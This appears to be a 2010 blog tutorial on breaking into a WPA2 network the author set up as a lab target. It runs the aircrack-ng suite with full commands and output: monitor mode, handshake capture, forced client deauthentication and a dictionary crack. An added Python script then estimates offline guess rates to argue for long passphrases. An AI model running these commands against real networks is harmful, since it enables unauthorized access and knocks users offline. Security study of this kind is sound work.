Hacking WPA2 Wireless Networks…

June 20, 2010 at 7:17 pm (Security, Wireless)

Hey,

I decided to document how to break into a WPA2-enabled wireless network, so I set up my LinkSys WRT54G wireless router over the weekend. Here is how I broke into it:

root@bt:~# airmon-ng stop wlan0
Interface Chipset Driver
wlan0 ZyDAS 1211 zd1211rw - [phy1]
(monitor mode disabled)

Start the wireless card in monitor mode:

root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 ZyDAS 1211 zd1211rw - [phy1]
(monitor mode enabled on mon0)

Now we want to run airodump-ng and filter out all the other access points and clients so that we only capture the handshake for our target access point (HackMe):

root@bt:~# airodump-ng --bssid 00:0C:41:9D:C7:5C --channel 6 --write HackMe-Demo mon0

CH 6 ][ Elapsed: 32 s ][ 2010-06-20 19:44 ][ WPA handshake: 00:0C:41:9D:C7:5C

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:0C:41:9D:C7:5C 0 100 316 38 0 6 54 WPA2 CCMP PSK HackMe

BSSID STATION PWR Rate Lost Packets Probes

00:0C:41:9D:C7:5C 00:21:5C:90:2D:89 0 1 - 1 126 456 HackMe

root@bt:~#

While we leave airodump-ng capturing packets and waiting for the WPA handshake, we can speed things up a little with aireplay-ng. Sending deauthentication frames to one of the associated clients knocks it off the network; it will automatically re-authenticate with the access point, and airodump-ng captures the 4-way handshake as it does so:

root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:42 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:43 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [126|184 ACKs]
root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:48 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:48 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [ 0|169 ACKs]
root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:50 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:51 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [185|179 ACKs]
root@bt:~#

Excellent, as you can see airodump-ng now reports the WPA handshake. Let's crack it and recover the WPA passphrase, which we can then use to connect to the wireless network:

CH 6 ][ Elapsed: 32 s ][ 2010-06-20 19:44 ][ WPA handshake: 00:0C:41:9D:C7:5C

root@bt:~# aircrack-ng -a 2 -b 00:0C:41:9D:C7:5C -e HackMe -w password.txt HackMe-Demo-01.cap
Opening HackMe-Demo-01.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1729

[00:00:00] 4 keys tested (67.32 k/s)

KEY FOUND! [ password ]

Master Key : 52 EC 07 C0 95 E6 7B 26 DD 40 59 67 10 7C F6 F7
BE EF E6 66 8D 70 A6 1C 56 BE F5 DD A2 B8 5D 32

Transient Key : 41 3E E2 11 47 CA DA EC 39 FA B8 23 79 4C 01 6A
AC B3 C0 45 FE 62 3F BF 4F 0A A9 B0 63 A1 AC 2E
D4 9C C6 09 C1 A9 82 A8 68 1B 71 BC 65 72 BE 97
C6 A8 2F A9 12 DA 08 C6 73 A5 90 DD E9 EF 5F 66

EAPOL HMAC : CA E1 1F 29 45 9A 1D 5D 1B 25 BF 51 92 1A 95 A9
root@bt:~#

Yay! We got the passphrase, which was “password” 🙂
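The passphrase fell in four guesses because, once the handshake is captured, every dictionary candidate costs the attacker only one offline PBKDF2 derivation and no further contact with the access point. The Python script below is an added example, not part of the original post or of aircrack-ng: it derives the WPA2-PSK Pairwise Master Key (the value aircrack-ng prints as "Master Key") from a passphrase and SSID exactly as IEEE 802.11i specifies, measures the guess rate on one CPU core, and shows how the worst-case exhaustion time grows with passphrase length, which is the lever a network owner actually controls. The SSID and passphrase are the ones from the post; the candidate passphrases and alphabet sizes are constructed for the demonstration.

```python
import hashlib
import time

# Values from the post above: the target SSID and the passphrase that was recovered.
SSID = "HackMe"
PASSPHRASE = "password"


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key per IEEE 802.11i: PBKDF2-HMAC-SHA1 with the SSID as
    salt, 4096 iterations, 256-bit output. This is what aircrack-ng labels
    "Master Key" once the right passphrase is found."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def measure_guess_rate(ssid: str, samples: int = 50) -> float:
    """Candidate passphrases per second on one CPU core. Each guess is one full
    PBKDF2 run; the candidates here are constructed, not a real wordlist."""
    start = time.perf_counter()
    for i in range(samples):
        wpa2_pmk(f"candidate-{i}", ssid)
    return samples / (time.perf_counter() - start)


def seconds_to_exhaust(alphabet_size: int, length: int, guesses_per_sec: float) -> float:
    """Worst-case time to try every passphrase of the given length drawn from an
    alphabet of the given size, at the given guess rate."""
    return (alphabet_size ** length) / guesses_per_sec


if __name__ == "__main__":
    pmk = wpa2_pmk(PASSPHRASE, SSID)
    print(f"PMK for passphrase {PASSPHRASE!r} on SSID {SSID!r}: {pmk.hex()}")
    rate = measure_guess_rate(SSID)
    print(f"about {rate:.0f} guesses/s on this machine (one core)")
    # 62 = upper + lower case letters + digits; 95 = printable ASCII.
    for alphabet, label in ((62, "alphanumeric"), (95, "printable ASCII")):
        for length in (8, 12, 20):
            years = seconds_to_exhaust(alphabet, length, rate) / (365 * 86400)
            print(f"  {length}-char {label}: {years:.3g} years worst case")
```

The rate measured here is a single CPU core driving OpenSSL; dedicated GPU crackers are orders of magnitude faster, so read the printed years as an upper bound on what an attacker needs, not a guarantee.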


3 Comments

  1. Spoon Rest said,

    Wireless routers are very necessary nowadays because we do not want so many wires running around the home.

  2. Martha Thomson said,

    I am very thankful for this topic because it really gives useful information.

  3. Jack said,

    Don't we need a dictionary for this attack... which one did you use?... You didn't mention it.
